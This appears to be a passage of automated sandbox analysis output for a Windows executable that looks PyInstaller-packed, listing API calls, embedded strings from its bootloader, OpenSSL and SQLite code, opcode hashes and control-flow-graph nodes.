                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                • Opcode ID: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
                                                                                                                                                                                                                                • Instruction ID: de75c900769d35fff3529f518f4e3621aba89e85ccf8640be368e0b3e218b3a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B51A322B0C64289EA60BF15A8A23BA6291FF85B95F444135ED4DC7BDEEF3CE545C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF644873804), ref: 00007FF6448736E1
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF644873804), ref: 00007FF6448736EB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872C50: MessageBoxW.USER32 ref: 00007FF644872D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction ID: 79b64d87b335e42266532746fd6705270bcfbca3dbfccebbacd77672012858d3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 402153A1B1CA4299FA20F724ECA73B66250BF98394F804136DE5DC65DDEF2DE504C701

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1095 7ff64488ba5c-7ff64488ba82 1096 7ff64488ba84-7ff64488ba98 call 7ff644884ee8 call 7ff644884f08 1095->1096 1097 7ff64488ba9d-7ff64488baa1 1095->1097 1111 7ff64488be8e 1096->1111 1098 7ff64488be77-7ff64488be83 call 7ff644884ee8 call 7ff644884f08 1097->1098 1099 7ff64488baa7-7ff64488baae 1097->1099 1117 7ff64488be89 call 7ff64488a8e0 1098->1117 1099->1098 1102 7ff64488bab4-7ff64488bae2 1099->1102 1102->1098 1104 7ff64488bae8-7ff64488baef 1102->1104 1108 7ff64488baf1-7ff64488bb03 call 7ff644884ee8 call 7ff644884f08 1104->1108 1109 7ff64488bb08-7ff64488bb0b 1104->1109 1108->1117 1114 7ff64488bb11-7ff64488bb17 1109->1114 1115 7ff64488be73-7ff64488be75 1109->1115 1116 7ff64488be91-7ff64488bea8 1111->1116 1114->1115 1119 7ff64488bb1d-7ff64488bb20 1114->1119 1115->1116 1117->1111 1119->1108 1122 7ff64488bb22-7ff64488bb47 1119->1122 1124 7ff64488bb49-7ff64488bb4b 1122->1124 1125 7ff64488bb7a-7ff64488bb81 1122->1125 1128 7ff64488bb72-7ff64488bb78 1124->1128 1129 7ff64488bb4d-7ff64488bb54 1124->1129 1126 7ff64488bb83-7ff64488bb8f call 7ff64488d5fc 1125->1126 1127 7ff64488bb56-7ff64488bb6d call 7ff644884ee8 call 7ff644884f08 call 7ff64488a8e0 1125->1127 1136 7ff64488bb94-7ff64488bbab call 7ff64488a948 * 2 1126->1136 1157 7ff64488bd00 1127->1157 1131 7ff64488bbf8-7ff64488bc0f 1128->1131 1129->1127 1129->1128 1134 7ff64488bc11-7ff64488bc19 1131->1134 1135 7ff64488bc8a-7ff64488bc94 call 7ff64489391c 1131->1135 1134->1135 1139 7ff64488bc1b-7ff64488bc1d 1134->1139 1146 7ff64488bd1e 1135->1146 1147 7ff64488bc9a-7ff64488bcaf 1135->1147 1160 7ff64488bbc8-7ff64488bbf3 call 7ff64488c284 1136->1160 1161 7ff64488bbad-7ff64488bbc3 call 7ff644884f08 call 7ff644884ee8 1136->1161 1139->1135 1143 7ff64488bc1f-7ff64488bc35 1139->1143 1143->1135 1148 7ff64488bc37-7ff64488bc43 1143->1148 1150 7ff64488bd23-7ff64488bd43 ReadFile 1146->1150 1147->1146 1152 7ff64488bcb1-7ff64488bcc3 GetConsoleMode 1147->1152 1148->1135 1153 7ff64488bc45-7ff64488bc47 1148->1153 1155 7ff64488bd49-7ff64488bd51 1150->1155 1156 7ff64488be3d-7ff64488be46 GetLastError 1150->1156 1152->1146 1158 7ff64488bcc5-7ff64488bccd 1152->1158 1153->1135 1159 7ff64488bc49-7ff64488bc61 1153->1159 1155->1156 1163 7ff64488bd57 1155->1163 1166 7ff64488be63-7ff64488be66 1156->1166 1167 7ff64488be48-7ff64488be5e call 7ff644884f08 call 7ff644884ee8 1156->1167 1168 7ff64488bd03-7ff64488bd0d call 7ff64488a948 1157->1168 1158->1150 1165 7ff64488bccf-7ff64488bcf1 ReadConsoleW 1158->1165 1159->1135 1169 7ff64488bc63-7ff64488bc6f 1159->1169 1160->1131 1161->1157 1173 7ff64488bd5e-7ff64488bd73 1163->1173 1175 7ff64488bd12-7ff64488bd1c 1165->1175 1176 7ff64488bcf3 GetLastError 1165->1176 1171 7ff64488bcf9-7ff64488bcfb call 7ff644884e7c 1166->1171 1172 7ff64488be6c-7ff64488be6e 1166->1172 1167->1157 1168->1116 1169->1135 1179 7ff64488bc71-7ff64488bc73 1169->1179 1171->1157 1172->1168 1173->1168 1182 7ff64488bd75-7ff64488bd80 1173->1182 1175->1173 1176->1171 1179->1135 1180 7ff64488bc75-7ff64488bc85 1179->1180 1180->1135 1187 7ff64488bd82-7ff64488bd9b call 7ff64488b674 1182->1187 1188 7ff64488bda7-7ff64488bdaf 1182->1188 1195 7ff64488bda0-7ff64488bda2 1187->1195 1191 7ff64488bdb1-7ff64488bdc3 1188->1191 1192 7ff64488be2b-7ff64488be38 call 7ff64488b4b4 1188->1192 1196 7ff64488be1e-7ff64488be26 1191->1196 1197 7ff64488bdc5 1191->1197 1192->1195 1195->1168 1196->1168 1199 7ff64488bdca-7ff64488bdd1 1197->1199 1200 7ff64488bdd3-7ff64488bdd7 1199->1200 1201 7ff64488be0d-7ff64488be18 1199->1201 1202 7ff64488bdf3 1200->1202 1203 7ff64488bdd9-7ff64488bde0 1200->1203 1201->1196 1204 7ff64488bdf9-7ff64488be09 1202->1204 1203->1202 1205 7ff64488bde2-7ff64488bde6 1203->1205 1204->1199 1207 7ff64488be0b 1204->1207 1205->1202 1206 7ff64488bde8-7ff64488bdf1 1205->1206 1206->1204 1207->1196
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                • Instruction ID: fc3e10131e72d4b54e171f405471ba1110d25cf7302ebdd2061e1b2bde9458ab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19C1DF22A0CA869AE660BB1594C22BD7B91FFC1B90F554131FE4E8779ADF7CE845C700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                • Instruction ID: 021450b99195abb182eb78ddebe253e38f3fe9423bc474d40665ae69ee38e4bb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9418121B1CA86D9EA11FB20E8A61E96351FF94394F900132DE5C8369DEF3CE505C740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007B6570
                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ssl_create_cipher_list
                                                                                                                                                                                                                                • API String ID: 4069847057-3764566645
                                                                                                                                                                                                                                • Opcode ID: 726e23a6b8cb307a27e720d3a7ef10f521669d0daa11103ec27c5745eebce1b2
                                                                                                                                                                                                                                • Instruction ID: 43bf4cc97c408c342f04d6bb4fa5375f0397514fa8ea08562e3df9f669c8cb31
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 726e23a6b8cb307a27e720d3a7ef10f521669d0daa11103ec27c5745eebce1b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39826A73B08B4681DB58CF55A460AB963A0FB14B84F688236DE7C8B788DF3DDA45C740

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1754 7ffdfaedff80-7ffdfaedffcc 1755 7ffdfaedffd1-7ffdfaee0044 1754->1755 1756 7ffdfaee006b-7ffdfaee007b call 7ffdfaedcfb0 1755->1756 1757 7ffdfaee0046-7ffdfaee0055 call 7ffdfaedf9a0 1755->1757 1764 7ffdfaee0582-7ffdfaee0585 1756->1764 1765 7ffdfaee0081-7ffdfaee00aa 1756->1765 1762 7ffdfaee005b-7ffdfaee0066 1757->1762 1763 7ffdfaee05e7-7ffdfaee060a call 7ffdfb002bc0 1757->1763 1762->1756 1768 7ffdfaee0587-7ffdfaee058e 1764->1768 1769 7ffdfaee05e2 1764->1769 1766 7ffdfaee00b0-7ffdfaee00c5 1765->1766 1776 7ffdfaee00c7-7ffdfaee00d3 1766->1776 1777 7ffdfaee0102-7ffdfaee010c 1766->1777 1771 7ffdfaee05d9 1768->1771 1772 7ffdfaee0590-7ffdfaee059a 1768->1772 1769->1763 1771->1769 1774 7ffdfaee059c 1772->1774 1775 7ffdfaee05a2-7ffdfaee05cf 1772->1775 1774->1775 1775->1769 1790 7ffdfaee05d1-7ffdfaee05d7 1775->1790 1778 7ffdfaee0116-7ffdfaee0131 1776->1778 1789 7ffdfaee00d5-7ffdfaee00db 1776->1789 1777->1778 1779 7ffdfaee010e-7ffdfaee0110 1777->1779 1782 7ffdfaee013a-7ffdfaee0143 1778->1782 1783 7ffdfaee0133-7ffdfaee0138 1778->1783 1779->1778 1781 7ffdfaee0358-7ffdfaee035f 1779->1781 1786 7ffdfaee03aa 1781->1786 1787 7ffdfaee0361-7ffdfaee036b 1781->1787 1788 7ffdfaee0146-7ffdfaee015a call 7ffdfaf96c60 1782->1788 1783->1788 1797 7ffdfaee03b3 1786->1797 1791 7ffdfaee0373-7ffdfaee03a0 1787->1791 1792 7ffdfaee036d 1787->1792 1803 7ffdfaee015c-7ffdfaee0176 call 7ffdfaf4e090 1788->1803 1804 7ffdfaee0178 1788->1804 1794 7ffdfaee00e3-7ffdfaee00e6 1789->1794 1795 7ffdfaee00dd-7ffdfaee00e1 1789->1795 1790->1769 1800 7ffdfaee03ba-7ffdfaee03bd 1791->1800 1819 7ffdfaee03a2-7ffdfaee03a8 1791->1819 1792->1791 1796 7ffdfaee00ef-7ffdfaee0100 1794->1796 1798 7ffdfaee00e8-7ffdfaee00ed 1794->1798 1795->1794 1795->1796 1796->1766 1797->1800 1798->1778 1798->1796 1806 7ffdfaee041b-7ffdfaee0420 1800->1806 1807 7ffdfaee03bf-7ffdfaee03c6 1800->1807 1805 7ffdfaee017a-7ffdfaee019c 1803->1805 1804->1805 1810 7ffdfaee01a0-7ffdfaee01c7 CreateFileW 1805->1810 1806->1763 1811 7ffdfaee03c8-7ffdfaee03cb 1807->1811 1812 7ffdfaee0412 1807->1812 1815 7ffdfaee01cd-7ffdfaee01cf 1810->1815 1816 7ffdfaee0270 1810->1816 1817 7ffdfaee03d3-7ffdfaee0400 1811->1817 1818 7ffdfaee03cd 1811->1818 1812->1806 1820 7ffdfaee01d1-7ffdfaee01e3 1815->1820 1821 7ffdfaee021f-7ffdfaee022c 1815->1821 1822 7ffdfaee0274-7ffdfaee0277 1816->1822 1817->1806 1847 7ffdfaee0402-7ffdfaee040d 1817->1847 1818->1817 1819->1797 1823 7ffdfaee01e5 1820->1823 1824 7ffdfaee01e7-7ffdfaee020d call 7ffdfaee07b0 1820->1824 1835 7ffdfaee026c-7ffdfaee026e 1821->1835 1836 7ffdfaee022e-7ffdfaee0234 1821->1836 1826 7ffdfaee0279-7ffdfaee02a2 call 7ffdfaed9330 1822->1826 1827 7ffdfaee02a7-7ffdfaee02ab 1822->1827 1823->1824 1845 7ffdfaee0211-7ffdfaee0213 1824->1845 1846 7ffdfaee020f 1824->1846 1826->1827 1832 7ffdfaee02b1-7ffdfaee02c1 call 7ffdfaed6300 1827->1832 1833 7ffdfaee045f-7ffdfaee046d 1827->1833 1848 7ffdfaee02c3-7ffdfaee02ca 1832->1848 1849 7ffdfaee031e-7ffdfaee0323 1832->1849 1837 7ffdfaee047d-7ffdfaee0496 call 7ffdfaed6300 1833->1837 1838 7ffdfaee046f-7ffdfaee047b 1833->1838 1835->1822 1842 7ffdfaee0246-7ffdfaee0249 1836->1842 1843 7ffdfaee0236-7ffdfaee0244 1836->1843 1859 7ffdfaee0498-7ffdfaee049f 1837->1859 1860 7ffdfaee04f3-7ffdfaee04f6 1837->1860 1838->1837 1850 7ffdfaee0252-7ffdfaee0267 1842->1850 1851 7ffdfaee024b-7ffdfaee0250 1842->1851 1843->1842 1843->1850 1853 7ffdfaee021b 1845->1853 1854 7ffdfaee0215-7ffdfaee0219 1845->1854 1846->1845 1847->1763 1857 7ffdfaee02cc-7ffdfaee02d6 1848->1857 1858 7ffdfaee0315 1848->1858 1855 7ffdfaee0329-7ffdfaee032e 1849->1855 1856 7ffdfaee0425-7ffdfaee045a call 7ffdfaedd7a0 call 7ffdfaf95c70 1849->1856 1850->1810 1851->1835 1851->1850 1853->1821 1854->1816 1854->1853 1855->1856 1862 7ffdfaee0334-7ffdfaee0353 1855->1862 1856->1763 1864 7ffdfaee02d8 1857->1864 1865 7ffdfaee02de-7ffdfaee030b 1857->1865 1858->1849 1869 7ffdfaee04ea 1859->1869 1870 7ffdfaee04a1-7ffdfaee04ab 1859->1870 1867 7ffdfaee04f8-7ffdfaee04fb 1860->1867 1868 7ffdfaee04fd 1860->1868 1862->1755 1864->1865 1865->1849 1887 7ffdfaee030d-7ffdfaee0313 1865->1887 1872 7ffdfaee0504-7ffdfaee051c 1867->1872 1868->1872 1869->1860 1873 7ffdfaee04b3-7ffdfaee04e0 1870->1873 1874 7ffdfaee04ad 1870->1874 1877 7ffdfaee0522-7ffdfaee052a 1872->1877 1878 7ffdfaee051e 1872->1878 1873->1860 1890 7ffdfaee04e2-7ffdfaee04e8 1873->1890 1874->1873 1879 7ffdfaee055a-7ffdfaee0580 1877->1879 1880 7ffdfaee052c-7ffdfaee0540 call 7ffdfaf96c60 1877->1880 1878->1877 1879->1763 1888 7ffdfaee0556 1880->1888 1889 7ffdfaee0542-7ffdfaee0554 call 7ffdfaf4e090 1880->1889 1887->1849 1888->1879 1889->1879 1889->1888 1890->1860
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                • Opcode ID: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
                                                                                                                                                                                                                                • Instruction ID: 4236e7773eec2bff7ec825052b7e9e623871f6b332561828216c839f7cf863b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC02C621B0E64386FB68AB11E8B4F7963A0FF85744F090275DD6E466E9CF3DE8849700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148$FileRead
                                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                • API String ID: 2943692350-1843600136
                                                                                                                                                                                                                                • Opcode ID: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
                                                                                                                                                                                                                                • Instruction ID: 5652dae5f970862e58b292e5ba0009794aa333f20b08cbfdfe6ad52409ae373a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93411532B0EA0381E324AF15E894DA97765FB45780F494132EA6E477ECDF3EE4469740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                • Instruction ID: 094555275460e41ab38db995bfd1209cf170517ad3ba8f7937622459db9d6069
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1417122D1C7818BE754BB6095923697760FB947A4F109335EE9C83ADAEF7CE5E08700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                • Opcode ID: 9309f1701a42d567f2b256d78ef444061abe5330f80f315c89d8de48205de333
